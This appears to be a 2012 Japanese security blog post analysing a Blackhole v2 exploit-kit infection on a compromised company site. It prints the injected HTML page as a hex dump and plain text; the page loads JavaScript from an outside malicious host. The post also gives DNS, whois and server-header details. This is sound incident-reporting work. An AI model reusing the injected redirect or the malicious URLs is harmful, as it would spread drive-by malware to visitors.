0day.jp (ゼロデイ.JP): #OCJP-070：「www.qi-inc.com/157.205.141.15」のBlackhole V2の感染された事件について

金曜日, 9月 28, 2012

#OCJP-070：「www.qi-inc.com/157.205.141.15」のBlackhole V2の感染された事件について

本日、17時間前に下記のURLにスパムメールに発見されました↓

hxxp://157.205.141.15/ABtH6Xj/index.html
hxxp://www.qi-inc.com/ABtH6Xj/index.html

感染されたIPは日本なので、下記のネットワークです↓

AS17514　JPNIC-JP-ASN-BLOCK Japan Network Information Center
157.205.0.0/16　OTSUKA CORPORATION X-Keiro: noc(at)aics.ad.jp

下記のHTMLファイルを発見しました。

00000000 3c 68 74 6d 6c 3e 0d 0a 3c 68 31 3e 57 41 49 54  ＜html＞..＜h1＞WAIT
00000010 20 50 4c 45 41 53 45 3c 2f 68 31 3e 0d 0a 20 3c  PLEASE＜/h1＞.. ＜
00000020 68 33 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 68  h3＞Loading...＜/h
00000030 33 3e 0d 0a 20 3c 73 63 72 69 70 74 20 74 79 70  3＞.. ＜script typ
00000040 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69  e="text/javascri
00000050 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f  pt" src="hxxp://
00000060 6d 65 6f 77 63 68 69 63 61 67 6f 2e 6e 65 74 2f  meowchicago.net/
00000070 48 6f 59 67 61 69 56 61 2f 6a 73 2e 6a 73 22 3e  HoYgaiVa/js.js"＞
00000080 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 3c 2f 68 74  ＜/script＞...＜/ht
00000090 6d 6c 3e                                         ml＞

中身はマルウェア感染サイトにあるJSコードを実行される

＜html＞＜h1＞WAIT PLEASE＜/h1＞＜h3＞Loading...＜/h3＞
＜script type="text/javascript" src="hxxp://meowchicago.net/HoYgaiVa/js.js"＞
＜/script＞＜/html＞

感染URLのパターンを見たらBLACKHOLEの感染仕組みだと分かっています。
念のためにVirusTotalサイトに確認しましょう↓

MD5: c327e6944090ffc115a40beb659adb43
File size: 147 バイト ( 147 bytes )
File name: index.html
File type: HTML
Tags: html
Detection: 16 / 43 ←マルウェアが検知されますね！
URL: [CLICK]

そのドメインは下記のIPに向いています（DNS情報）↓

;; QUESTION SECTION:
;www.qi-inc.com.                        IN      A

;; ANSWER SECTION:
www.qi-inc.com.         3600    IN      A       157.205.141.15

;; AUTHORITY SECTION:
qi-inc.com.             3600    IN      NS      gntdns03.alpha-plt.jp.
qi-inc.com.             3600    IN      NS      gntdns02.alpha-plt.jp.
qi-inc.com.             3600    IN      NS      gntdns01.alpha-plt.jp.

ネットワーク情報↓

inetnum:        157.205.0.0 - 157.205.255.255
netname:        JOINUS-NET
country:        JP
descr:          Otsuka Corporation
admin-c:        OT27-AP
tech-c:         OT27-AP

ですが、お名前.COMでドメインを取ったみたいですね↓

Domain Name: qi-inc.com
Created On: 1996-09-21 00:00:00.0
Last Updated On: 2012-09-20 00:17:12.0
Expiration Date: 2013-09-20 04:00:00.0
Status: ACTIVE
Registrant Name: QI Incorporated
Registrant Organization: QI Incorporated
Registrant Street1: 2-4-7 Fukuura Kanazawa-ku
Registrant City: Yokohama-city
Registrant State: kanagawa
Registrant Postal Code: 236-0004
Registrant Country: JP
Registrant Phone: 9999999999
Registrant Email: admin(at)onamae.com

ホームページまでに内容を確認しました↓

↑マルウェアサイトじゃないですね。何故感染URLが発見されたかと調査しました…
結果、古いPHPバーションの脆弱性が入っていますので、その経由で
BLACKHOLE（バーション２）にマルウェアページがインジェクトされた可能性があります。
もう一つ可能性として、FTPアカウントが漏れてしまいました。
提供されているPHPバーション情報をみたら古いバーションが使っていますね。

HTTP/1.1 200 OK
Date: Thu, 27 Sep 2012 16:20:25 GMT
Server: Apache
X-Powered-By: PHP/4.4.1　←結構古い
Set-Cookie: PHPSESSID=9642b25059d9dcb79545e64eb5532aec; expires=Thu, 27 Sep 2012 17:20:25 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

PHP/4.4.1の脆弱性は沢山ありますので、詳細な脆弱性の一覧は【こちらへ】
FTP情報が漏れた場合、私の海外研究者は新しい発見した物があり、ZeuSマルウェアが盗んだ個人情報のサイトです。イメージ的には【こちら】のウェブページへご覧下さい。
【2012年9月28日の追加情報】【重要】調査を続きましたが、結果：上記のマルウェアサイトに本事件のFTPアカウントを発見しましたので、早めにFTPアカウントを変更して下さい！お願いします。

2 件のコメント:

Unknown2012年9月28日 1:52:00 JST
Care if i repost this with English Translation?
返信削除
返信
unixfreaxjp2012年9月28日 1:57:00 JST
Not at all!
返信削除
返信

コメントを追加